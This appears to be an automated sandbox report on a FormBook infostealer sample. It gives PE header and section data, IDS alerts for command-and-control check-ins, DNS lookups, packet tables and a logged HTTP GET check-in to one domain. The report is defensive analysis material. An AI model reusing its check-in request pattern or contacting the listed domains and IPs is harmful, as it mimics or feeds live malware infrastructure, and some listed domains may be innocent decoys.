Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8f7cf	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x90000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8ce18	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8d828	0x8da00	False	0.9327145851721095	data	7.915189773853943	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x90000	0x5d4	0x600	False	0.4303385416666667	data	4.145745420950532	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x90090	0x344	data			0.43301435406698563
RT_MANIFEST	0x903e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4154.205.127.20149751802031412 10/26/23-09:49:19.774091	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.4	154.205.127.201
192.168.2.434.68.234.449753802031412 10/26/23-09:50:00.519357	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49753	80	192.168.2.4	34.68.234.4
192.168.2.4154.86.64.9649754802031412 10/26/23-09:50:21.217300	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.4	154.86.64.96
192.168.2.43.64.163.5049747802031412 10/26/23-09:47:37.390469	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.4	3.64.163.50
192.168.2.4199.34.228.19149752802031412 10/26/23-09:49:39.892248	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.4	199.34.228.191
192.168.2.4167.172.228.2649755802031412 10/26/23-09:50:41.435579	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49755	80	192.168.2.4	167.172.228.26
192.168.2.491.195.240.1949743802031412 10/26/23-09:47:16.596276	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.4	91.195.240.19
192.168.2.445.64.97.6049750802031412 10/26/23-09:48:59.501363	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49750	80	192.168.2.4	45.64.97.60
192.168.2.413.32.208.7249749802031412 10/26/23-09:48:38.253900	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.4	13.32.208.72
192.168.2.4103.120.80.11149748802031412 10/26/23-09:47:58.535070	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.4	103.120.80.111

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2023 09:47:16.410836935 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:16.595984936 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.596276045 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:16.596276045 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:16.820709944 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850316048 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850387096 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850404978 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850442886 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850461960 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850481987 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850522041 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850568056 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850604057 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:16.850605011 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:16.850629091 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850652933 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:16.850755930 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:16.850811005 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.034360886 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034400940 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034424067 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034454107 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.034507036 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034544945 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.034595966 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034620047 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034658909 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.034663916 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034744978 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034785986 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.034810066 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:17.034892082 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.034925938 CEST	49743	80	192.168.2.4	91.195.240.19
Oct 26, 2023 09:47:17.218537092 CEST	80	49743	91.195.240.19	192.168.2.4
Oct 26, 2023 09:47:37.209944010 CEST	49747	80	192.168.2.4	3.64.163.50
Oct 26, 2023 09:47:37.390264034 CEST	80	49747	3.64.163.50	192.168.2.4
Oct 26, 2023 09:47:37.390360117 CEST	49747	80	192.168.2.4	3.64.163.50
Oct 26, 2023 09:47:37.390469074 CEST	49747	80	192.168.2.4	3.64.163.50
Oct 26, 2023 09:47:37.570849895 CEST	80	49747	3.64.163.50	192.168.2.4
Oct 26, 2023 09:47:37.570867062 CEST	80	49747	3.64.163.50	192.168.2.4
Oct 26, 2023 09:47:37.570894003 CEST	80	49747	3.64.163.50	192.168.2.4
Oct 26, 2023 09:47:37.570998907 CEST	49747	80	192.168.2.4	3.64.163.50
Oct 26, 2023 09:47:37.571033001 CEST	49747	80	192.168.2.4	3.64.163.50
Oct 26, 2023 09:47:37.750998974 CEST	80	49747	3.64.163.50	192.168.2.4
Oct 26, 2023 09:47:58.225100994 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:58.534810066 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.534959078 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:58.535069942 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:58.844203949 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844593048 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844628096 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844665051 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844698906 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844732046 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844759941 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:58.844765902 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844803095 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844849110 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:58.844855070 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844888926 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844921112 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:58.844963074 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:58.845020056 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:59.029831886 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:59.154012918 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:59.154048920 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:59.154066086 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:59.154261112 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:59.154304028 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:47:59.339428902 CEST	80	49748	103.120.80.111	192.168.2.4
Oct 26, 2023 09:47:59.339509010 CEST	49748	80	192.168.2.4	103.120.80.111
Oct 26, 2023 09:48:38.160202980 CEST	49749	80	192.168.2.4	13.32.208.72
Oct 26, 2023 09:48:38.253674030 CEST	80	49749	13.32.208.72	192.168.2.4
Oct 26, 2023 09:48:38.253819942 CEST	49749	80	192.168.2.4	13.32.208.72
Oct 26, 2023 09:48:38.253900051 CEST	49749	80	192.168.2.4	13.32.208.72
Oct 26, 2023 09:48:38.347273111 CEST	80	49749	13.32.208.72	192.168.2.4
Oct 26, 2023 09:48:38.347337008 CEST	80	49749	13.32.208.72	192.168.2.4
Oct 26, 2023 09:48:38.347440958 CEST	49749	80	192.168.2.4	13.32.208.72
Oct 26, 2023 09:48:38.347445965 CEST	80	49749	13.32.208.72	192.168.2.4
Oct 26, 2023 09:48:38.347492933 CEST	49749	80	192.168.2.4	13.32.208.72
Oct 26, 2023 09:48:38.440840960 CEST	80	49749	13.32.208.72	192.168.2.4
Oct 26, 2023 09:48:59.159486055 CEST	49750	80	192.168.2.4	45.64.97.60
Oct 26, 2023 09:48:59.484131098 CEST	80	49750	45.64.97.60	192.168.2.4
Oct 26, 2023 09:48:59.484283924 CEST	49750	80	192.168.2.4	45.64.97.60
Oct 26, 2023 09:48:59.501363039 CEST	49750	80	192.168.2.4	45.64.97.60
Oct 26, 2023 09:48:59.826574087 CEST	80	49750	45.64.97.60	192.168.2.4
Oct 26, 2023 09:48:59.829467058 CEST	80	49750	45.64.97.60	192.168.2.4
Oct 26, 2023 09:48:59.829545021 CEST	80	49750	45.64.97.60	192.168.2.4
Oct 26, 2023 09:48:59.829579115 CEST	80	49750	45.64.97.60	192.168.2.4
Oct 26, 2023 09:48:59.829682112 CEST	49750	80	192.168.2.4	45.64.97.60
Oct 26, 2023 09:48:59.829745054 CEST	49750	80	192.168.2.4	45.64.97.60
Oct 26, 2023 09:48:59.829745054 CEST	49750	80	192.168.2.4	45.64.97.60
Oct 26, 2023 09:49:19.512053967 CEST	49751	80	192.168.2.4	154.205.127.201
Oct 26, 2023 09:49:19.671108007 CEST	80	49751	154.205.127.201	192.168.2.4
Oct 26, 2023 09:49:19.671221018 CEST	49751	80	192.168.2.4	154.205.127.201
Oct 26, 2023 09:49:19.774091005 CEST	49751	80	192.168.2.4	154.205.127.201
Oct 26, 2023 09:49:19.937040091 CEST	80	49751	154.205.127.201	192.168.2.4
Oct 26, 2023 09:49:19.937092066 CEST	80	49751	154.205.127.201	192.168.2.4
Oct 26, 2023 09:49:19.937145948 CEST	49751	80	192.168.2.4	154.205.127.201
Oct 26, 2023 09:49:19.937218904 CEST	49751	80	192.168.2.4	154.205.127.201
Oct 26, 2023 09:49:20.096142054 CEST	80	49751	154.205.127.201	192.168.2.4
Oct 26, 2023 09:49:39.728118896 CEST	49752	80	192.168.2.4	199.34.228.191
Oct 26, 2023 09:49:39.892045975 CEST	80	49752	199.34.228.191	192.168.2.4
Oct 26, 2023 09:49:39.892132044 CEST	49752	80	192.168.2.4	199.34.228.191
Oct 26, 2023 09:49:39.892247915 CEST	49752	80	192.168.2.4	199.34.228.191
Oct 26, 2023 09:49:40.056324959 CEST	80	49752	199.34.228.191	192.168.2.4
Oct 26, 2023 09:49:40.089838982 CEST	80	49752	199.34.228.191	192.168.2.4
Oct 26, 2023 09:49:40.089878082 CEST	80	49752	199.34.228.191	192.168.2.4
Oct 26, 2023 09:49:40.089899063 CEST	80	49752	199.34.228.191	192.168.2.4
Oct 26, 2023 09:49:40.089915991 CEST	80	49752	199.34.228.191	192.168.2.4
Oct 26, 2023 09:49:40.089960098 CEST	49752	80	192.168.2.4	199.34.228.191
Oct 26, 2023 09:49:40.089997053 CEST	49752	80	192.168.2.4	199.34.228.191
Oct 26, 2023 09:49:40.089997053 CEST	49752	80	192.168.2.4	199.34.228.191
Oct 26, 2023 09:50:00.392940044 CEST	49753	80	192.168.2.4	34.68.234.4
Oct 26, 2023 09:50:00.519177914 CEST	80	49753	34.68.234.4	192.168.2.4
Oct 26, 2023 09:50:00.519249916 CEST	49753	80	192.168.2.4	34.68.234.4
Oct 26, 2023 09:50:00.519356966 CEST	49753	80	192.168.2.4	34.68.234.4
Oct 26, 2023 09:50:00.645467997 CEST	80	49753	34.68.234.4	192.168.2.4
Oct 26, 2023 09:50:00.645550013 CEST	80	49753	34.68.234.4	192.168.2.4
Oct 26, 2023 09:50:00.645566940 CEST	80	49753	34.68.234.4	192.168.2.4
Oct 26, 2023 09:50:00.645695925 CEST	49753	80	192.168.2.4	34.68.234.4
Oct 26, 2023 09:50:00.648089886 CEST	49753	80	192.168.2.4	34.68.234.4
Oct 26, 2023 09:50:00.774158001 CEST	80	49753	34.68.234.4	192.168.2.4
Oct 26, 2023 09:50:20.919488907 CEST	49754	80	192.168.2.4	154.86.64.96
Oct 26, 2023 09:50:21.217022896 CEST	80	49754	154.86.64.96	192.168.2.4
Oct 26, 2023 09:50:21.217171907 CEST	49754	80	192.168.2.4	154.86.64.96
Oct 26, 2023 09:50:21.217299938 CEST	49754	80	192.168.2.4	154.86.64.96
Oct 26, 2023 09:50:21.514810085 CEST	80	49754	154.86.64.96	192.168.2.4
Oct 26, 2023 09:50:21.514841080 CEST	80	49754	154.86.64.96	192.168.2.4
Oct 26, 2023 09:50:21.514852047 CEST	80	49754	154.86.64.96	192.168.2.4
Oct 26, 2023 09:50:21.515085936 CEST	49754	80	192.168.2.4	154.86.64.96
Oct 26, 2023 09:50:21.515085936 CEST	49754	80	192.168.2.4	154.86.64.96
Oct 26, 2023 09:50:21.812525988 CEST	80	49754	154.86.64.96	192.168.2.4
Oct 26, 2023 09:50:41.330286026 CEST	49755	80	192.168.2.4	167.172.228.26
Oct 26, 2023 09:50:41.434815884 CEST	80	49755	167.172.228.26	192.168.2.4
Oct 26, 2023 09:50:41.434892893 CEST	49755	80	192.168.2.4	167.172.228.26
Oct 26, 2023 09:50:41.435579062 CEST	49755	80	192.168.2.4	167.172.228.26
Oct 26, 2023 09:50:41.540225983 CEST	80	49755	167.172.228.26	192.168.2.4
Oct 26, 2023 09:50:41.637140036 CEST	80	49755	167.172.228.26	192.168.2.4
Oct 26, 2023 09:50:41.637168884 CEST	80	49755	167.172.228.26	192.168.2.4
Oct 26, 2023 09:50:41.637382984 CEST	49755	80	192.168.2.4	167.172.228.26
Oct 26, 2023 09:50:41.637382984 CEST	49755	80	192.168.2.4	167.172.228.26
Oct 26, 2023 09:50:41.742058039 CEST	80	49755	167.172.228.26	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2023 09:47:16.265609026 CEST	55458	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:47:16.409765959 CEST	53	55458	1.1.1.1	192.168.2.4
Oct 26, 2023 09:47:37.061995029 CEST	64030	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:47:37.209073067 CEST	53	64030	1.1.1.1	192.168.2.4
Oct 26, 2023 09:47:57.483474970 CEST	52912	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:47:58.223954916 CEST	53	52912	1.1.1.1	192.168.2.4
Oct 26, 2023 09:48:17.608584881 CEST	54627	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:48:17.870615005 CEST	53	54627	1.1.1.1	192.168.2.4
Oct 26, 2023 09:48:38.014658928 CEST	52298	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:48:38.159200907 CEST	53	52298	1.1.1.1	192.168.2.4
Oct 26, 2023 09:48:58.603426933 CEST	56820	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:48:59.158416986 CEST	53	56820	1.1.1.1	192.168.2.4
Oct 26, 2023 09:49:19.179698944 CEST	64664	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:49:19.510580063 CEST	53	64664	1.1.1.1	192.168.2.4
Oct 26, 2023 09:49:39.530380964 CEST	50199	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:49:39.726914883 CEST	53	50199	1.1.1.1	192.168.2.4
Oct 26, 2023 09:50:00.199660063 CEST	53868	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:50:00.391978025 CEST	53	53868	1.1.1.1	192.168.2.4
Oct 26, 2023 09:50:20.624046087 CEST	53843	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:50:20.918581963 CEST	53	53843	1.1.1.1	192.168.2.4
Oct 26, 2023 09:50:41.052541971 CEST	64940	53	192.168.2.4	1.1.1.1
Oct 26, 2023 09:50:41.303143978 CEST	53	64940	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2023 09:47:16.265609026 CEST	192.168.2.4	1.1.1.1	0x2114	Standard query (0)	www.quailrun-inc.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:47:37.061995029 CEST	192.168.2.4	1.1.1.1	0x4d18	Standard query (0)	www.bollywood.nexus	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:47:57.483474970 CEST	192.168.2.4	1.1.1.1	0xd746	Standard query (0)	www.lpqxmz.site	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:17.608584881 CEST	192.168.2.4	1.1.1.1	0xd7b6	Standard query (0)	www.tcbbuilds.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:38.014658928 CEST	192.168.2.4	1.1.1.1	0x913e	Standard query (0)	www.therealnikib.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:58.603426933 CEST	192.168.2.4	1.1.1.1	0x1a52	Standard query (0)	www.slotjitu88.website	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:49:19.179698944 CEST	192.168.2.4	1.1.1.1	0x890c	Standard query (0)	www.iqixuehe.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:49:39.530380964 CEST	192.168.2.4	1.1.1.1	0x8656	Standard query (0)	www.candicrem.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:50:00.199660063 CEST	192.168.2.4	1.1.1.1	0xe988	Standard query (0)	www.therenixgroupllc.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:50:20.624046087 CEST	192.168.2.4	1.1.1.1	0xb4a2	Standard query (0)	www.7141999.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:50:41.052541971 CEST	192.168.2.4	1.1.1.1	0xbe65	Standard query (0)	www.pacersun.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2023 09:47:16.409765959 CEST	1.1.1.1	192.168.2.4	0x2114	No error (0)	www.quailrun-inc.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2023 09:47:16.409765959 CEST	1.1.1.1	192.168.2.4	0x2114	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:47:37.209073067 CEST	1.1.1.1	192.168.2.4	0x4d18	No error (0)	www.bollywood.nexus		3.64.163.50	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:47:58.223954916 CEST	1.1.1.1	192.168.2.4	0xd746	No error (0)	www.lpqxmz.site		103.120.80.111	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:17.870615005 CEST	1.1.1.1	192.168.2.4	0xd7b6	Server failure (2)	www.tcbbuilds.com	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:38.159200907 CEST	1.1.1.1	192.168.2.4	0x913e	No error (0)	www.therealnikib.com	d3at2k7gv5wser.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2023 09:48:38.159200907 CEST	1.1.1.1	192.168.2.4	0x913e	No error (0)	d3at2k7gv5wser.cloudfront.net		13.32.208.72	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:38.159200907 CEST	1.1.1.1	192.168.2.4	0x913e	No error (0)	d3at2k7gv5wser.cloudfront.net		13.32.208.19	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:38.159200907 CEST	1.1.1.1	192.168.2.4	0x913e	No error (0)	d3at2k7gv5wser.cloudfront.net		13.32.208.90	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:38.159200907 CEST	1.1.1.1	192.168.2.4	0x913e	No error (0)	d3at2k7gv5wser.cloudfront.net		13.32.208.70	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:48:59.158416986 CEST	1.1.1.1	192.168.2.4	0x1a52	No error (0)	www.slotjitu88.website	slotjitu88.website		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2023 09:48:59.158416986 CEST	1.1.1.1	192.168.2.4	0x1a52	No error (0)	slotjitu88.website		45.64.97.60	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:49:19.510580063 CEST	1.1.1.1	192.168.2.4	0x890c	No error (0)	www.iqixuehe.com		154.205.127.201	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:49:39.726914883 CEST	1.1.1.1	192.168.2.4	0x8656	No error (0)	www.candicrem.com		199.34.228.191	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:50:00.391978025 CEST	1.1.1.1	192.168.2.4	0xe988	No error (0)	www.therenixgroupllc.com	flash.funnels.msgsndr.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2023 09:50:00.391978025 CEST	1.1.1.1	192.168.2.4	0xe988	No error (0)	flash.funnels.msgsndr.com		34.68.234.4	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:50:20.918581963 CEST	1.1.1.1	192.168.2.4	0xb4a2	No error (0)	www.7141999.com		154.86.64.96	A (IP address)	IN (0x0001)	false
Oct 26, 2023 09:50:41.303143978 CEST	1.1.1.1	192.168.2.4	0xbe65	No error (0)	www.pacersun.com	pacersun.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2023 09:50:41.303143978 CEST	1.1.1.1	192.168.2.4	0xbe65	No error (0)	pacersun.com		167.172.228.26	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.quailrun-inc.com

www.bollywood.nexus

www.lpqxmz.site

www.therealnikib.com

www.slotjitu88.website

www.iqixuehe.com

www.candicrem.com

www.therenixgroupllc.com

www.7141999.com

www.pacersun.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49743	91.195.240.19	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:47:16.596276045 CEST	46	OUT	GET /4hc5/?ntxh9=V48LzvX0&P6=/VQHqX0ksQJGmUtuF+SmenrWXhlVL4nIAkrjzD1bv3XMK1Eb428apYspiXxzNiZFnR1c HTTP/1.1 Host: www.quailrun-inc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:47:16.850316048 CEST	47	IN	HTTP/1.1 200 OK date: Thu, 26 Oct 2023 07:47:16 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0u9RF1xSBp0klsQTvRRBj9syLHtooV/LoaHMK5SZuthdgGYN4AcWeJLw8oADLEca+Qpy/xXZB1OaBxCnWUWACQ== last-modified: Thu, 26 Oct 2023 07:47:16 GMT x-cache-miss-from: parking-697977dd84-k4d52 server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 30 75 39 52 46 31 78 53 42 70 30 6b 6c 73 51 54 76 52 52 42 6a 39 73 79 4c 48 74 6f 6f 56 2f 4c 6f 61 48 